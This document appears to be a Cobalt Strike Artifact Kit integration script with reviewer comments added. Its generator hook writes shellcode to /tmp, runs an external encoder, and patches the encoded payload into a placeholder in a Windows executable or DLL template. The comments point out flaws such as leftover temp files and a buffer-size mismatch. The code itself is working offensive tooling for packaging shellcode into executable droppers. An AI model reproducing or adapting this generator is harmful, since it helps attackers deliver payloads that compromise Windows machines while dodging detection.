artifact.cna
# Artifact Kit Integration Script
# Windows Executables and DLLs
#
# Arguments
# $1 = artifact file (e.g., artifact32.exe)
# $2 = shellcode
# Return
# our generated artifact
# Hook that builds a Windows executable/DLL artifact from a template resource
# and a shellcode blob. The shellcode is first passed through an external
# encoder script via fixed files under /tmp, then the encoded bytes are
# spliced into a fixed-size placeholder inside the template.
#
# $1 ($resource) = template file name, resolved with script_resource()
# $2 ($payload)  = raw shellcode
# Returns the patched template contents, or $null when the template is missing.
set EXECUTABLE_ARTIFACT_GENERATOR {
# NOTE(review): $temp, $msf, $in and $encoded_payload are not in this local()
# list, so in Sleep they are script-global rather than per-call.
local('$handle $data $key $index $payload $resource $buffer $b $x');
($resource, $payload) = @_;
# The raw (unencoded) shellcode is written in cleartext to a fixed,
# predictable path in the shared /tmp directory. Nothing in this function
# removes it afterwards, so it persists on the operator host as a forensic
# artifact unless the encoder script cleans it up.
$temp = openf(">/tmp/ridgwayunencoded.bin");
writeb($temp, $payload);
closef($temp);
# Run the external encoder and block until it exits. Its exit status is
# not checked, so a failed encode is only noticed (if at all) when the
# output file below cannot be read.
$msf = exec("/opt/cobaltstrike-artifactkit/artifact/dist-ridgway/encode_payload.sh");
wait($msf);
closef($msf);
# Read back the encoder's output from a second fixed /tmp path. Unlike the
# template below, there is no existence check on this file.
$in = openf("/tmp/ridgwayencoded.bin");
$encoded_payload = readb($in, -1);
closef($in);
# Bail out if the requested template is not shipped with this script.
# Note the ordering: the /tmp files above have already been written by the
# time this check runs, so they are left behind even on this early return.
if (!-exists script_resource($resource)) {
return $null;
}
# read in the executable template
$handle = openf(script_resource($resource));
$data = readb($handle, -1);
closef($handle);
# Locate the placeholder: a run of 1536 'A' bytes embedded in the template.
$index = indexOf($data, 'A' x 1536);
# In-memory buffer sized to match the placeholder.
$buffer = allocate(1536);
# Copy the encoded payload into the buffer one byte at a time.
for ($x = 0; $x < strlen($encoded_payload); $x++) {
writeb($buffer, chr((byteAt($encoded_payload, $x))));
}
# Closing the allocated buffer ends the write phase; readb then returns
# everything written to it so far.
closef($buffer);
$b = readb($buffer, -1);
# Overwrite the placeholder with the buffer contents. "$[1024]b" formats
# $b to exactly 1024 characters, so only the first 1024 bytes of the
# 1536-byte placeholder are replaced and any payload beyond 1024 bytes is
# dropped. NOTE(review): the 1536/1024 mismatch looks unintentional —
# confirm against what the template stub actually expects.
return replaceAt($data, "$[1024]b", $index);
}